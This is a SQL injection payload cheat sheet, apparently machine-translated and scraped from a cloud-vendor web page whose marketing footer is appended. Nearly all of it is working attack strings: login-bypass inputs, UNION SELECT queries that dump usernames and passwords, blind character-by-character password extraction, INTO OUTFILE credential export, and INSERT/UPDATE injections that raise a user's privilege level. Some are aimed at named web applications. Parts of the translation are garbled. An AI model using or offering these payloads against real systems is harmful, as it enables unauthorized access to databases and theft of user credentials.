' Or 1=1
' or ' 1=1
'/*
'%23
' and password= ' Mypass
Id=-1 Union Select 1,1,1
Id=-1 Union Select char (), char (), char (97)
Id=1 Union select 1,1,1 from members
Id=1 Union select 1,1,1 from admin
Id=1 Union select 1,1,1 from user
Userid=1 and Password=mypass
Userid=1 and Mid (password,3,1) =char (112)
Userid=1 and Mid (password,4,1) =char (97)
and Ord (Mid (password,3,1)) >111 (Ord function is very good, can return to the plastic)
' and length (password) = ' 6 (Probe password length)
' and Left (password,1) = ' m
' and Left (password,2) = ' my
.............................. By analogy
' Union select 1,username,password from user/*
' Union select 1,username,password from user/*
= ' Union select 1,username,password from user/* (can be 1 or = after directly with)
99999 ' Union select 1,username,password from user/*
' Into outfile ' c:/file.txt (export file)
= ' or 1=1 into outfile ' C:/file.txt
1 ' union select 1,username,password from user into outfile ' c:/user.txt
SELECT Password from admins WHERE login= ' John ' into DumpFile '/path/to/site/file.txt '
Id= ' Union select 1,username,password from user into outfile
Id=-1 Union Select 1,database (), version () (Flexible application query)
Common query test statements,
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE ' uuu ' = ' UUU '
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL (NULL)
SELECT * FROM table WHERE ISNULL (COT (0))
SELECT * FROM table WHERE 1 was not NULL
SELECT * FROM table WHERE null is NULL
SELECT * FROM Table WHERE 2 BETWEEN 1 and 3
SELECT * FROM table WHERE ' B ' BETWEEN ' A ' and ' C '
SELECT * FROM Table WHERE 2 in (0,1,2)
SELECT * FROM table WHERE case is 1>0 THEN 1 end
For example: Night Cat Download System version 1.0
Id=1 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1
id=10000 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 and groupid=1
Union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 (replace, find password)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,1,1)) =49 (verify first-digit password)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,2,1)) =50 (second place)
Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where Id=1 and Ord (Mid (password,3,1)) =51
..................................................................
For example 2: Gray trajectory Transformation ID for testing (meteor)
Union%20 (Select%20allowsmilies,public,userid, ' 0000-0-0 ', User (), version ()%20from%20calendar_events%20where% 20eventid%20=%2013)%20order%20by%20eventdate
Union%20 (Select%20allowsmilies,public,userid, ' 0000-0-0 ', Pass (), version ()%20from%20calendar_events%20where% 20eventid%20=%2010)%20order%20by%20eventdate
To construct a statement:
Select Allowsmilies,public,userid,eventdate,event,subject from calendar_events WHERE EventID = 1 Union (select 1,1,1,1,1 , 1,1 from user where userid=1)
Select Allowsmilies,public,userid,eventdate,event,subject from calendar_events WHERE EventID = 1 Union (select 1,1,1,1, Username,password from user where userid=1)
Union%20 (select%201,0,2, ' 1999-01-01 ', ' a ', password%20from%20user%20where%20userid%20=%205)%20order%20by% 20eventdate
Union%20 (select%201,0,12695, ' 1999-01-01 ', ' a ', password%20from%20user%20where%20userid=13465)%20order%20by% 20eventdate
Union%20 (select%201,0,12695, ' 1999-01-01 ', ' a ', userid%20from%20user%20where%20username= ' Sandflee ')%20order%20by% 20eventdate (check the ID of the sand)
(SELECT A from table_name WHERE a=10 and B=1 order by a LIMIT 10)
SELECT * FROM article WHERE articleid= ' $id ' UNION SELECT * from ... (Fields and databases are in the same situation, can be submitted directly)
SELECT * FROM article WHERE articleid= ' $id ' UNION select 1,1,1,1,1,1,1 ... (Under different circumstances)
Special skills: In forms, search engines and other places to write:
“___”
“.__ ”
“%
% ' ORDER by articleid/*
% ' ORDER by articleid#
__ ' ORDER BY articleid/*
__ ' ORDER BY articleid#
$command = "dir c:\"; system ($command);
SELECT * from article WHERE articleid= ' $id '
SELECT * from article WHERE articleid= $id
1 ' and 1=2 union SELECT * from user where userid=1/* sentence becomes
(SELECT * from article where articleid= ' 1 "and 1=2 Union SELECT * from user WHERE userid=1/* ')
1 and 1=2 Union SELECT * from user where userid=1
Statement form: Create a library, insert:
CREATE DATABASE ' injection '
CREATE TABLE ' user ' (
' userid ' int (one) not NULL auto_increment,
' username ' varchar not NULL default ',
' Password ' varchar not NULL default ',
PRIMARY KEY (' userid ')
) ;
INSERT into ' user ' VALUES (1, ' Swap ', ' mypass ');
is inserted as a registered User:
INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' $username ', ' $PASSW Ord ', ' $homepage ', ' 1 ');
INSERT into membres (login,password,nom,email,userlevel) VALUES (' $login ', ' $pass ', ' $nom ', ' $email ', ' 1 ');
INSERT into membres (login,password,nom,email,userlevel) VALUES (', ', ', ', ', ', ', ', ', ' 3 ') # ', ' 1 ')
INSERT into membres SET login= ' $login ', password= ' $pass ', nom= ' $nom ', email= ' $email ';
INSERT into membres SET login= ', password= ', nom= ', userlevel= ' 3 ', email= '
' inserts into membres VALUES (' $id ', ' $login ', ' $pass ', ' $nom ', ' $email ', ' 1 ');
Update user set password= ' $password ', homepage= ' $homepage ' WHERE id= ' $id '
UPDATE user set password= ' MD5 (mypass) ' W Here username= ' admin ' #) ', homepage= ' $homepage ' WHERE id= ' $id '
' UPDATE membres SET password= ' $pass ', nom= ' $nom ', Email= ' $email ' WHERE id= ' $id ';
Update membres set password= ' [Pass] ', nom= ', userlevel= ' 3 ', email= ' WHERE id= ' [id] '
UPDATE news SET Votes=votes +1, score=score+ $note WHERE idnews= ' $id ';
Long function:
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
For example:
UPDATE article Set title= $title WHERE articleid=1 corresponding function
UPDATE article SET title=database () where id=1
#把当前数据库名更新到title字段
Upda TE article set Title=user () where id=1
#把当前 MySQL user name to update to Title field
Update article set Title=system_user () where id=1
Update #把当前 MySQL username to Title field
Update article SET title=session_user () WHERE id=1
#把当前 mysql user name to update to Title field
Updat E article SET title=current_user () WHERE id=1
#把当前会话被验证匹配的用户名更新到title字段
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
$req = "SELECT * from membres WHERE name is $search% ' order by name";
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name
SELECT uid from admins WHERE login= ' or ' a ' = ' a ' and password= ' or ' a ' = ' a ' (classic)
SELECT uid from admins WHERE login= ' OR admin_level=1# ' and password= '
SELECT * FROM table WHERE msg like '%hop '
SELECT uid from membres WHERE login= ' Bob ' and password like ' a% ' and password= '
SELECT * from membres WHERE name like ' percent ' order by uid#% ' ORDER by name
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
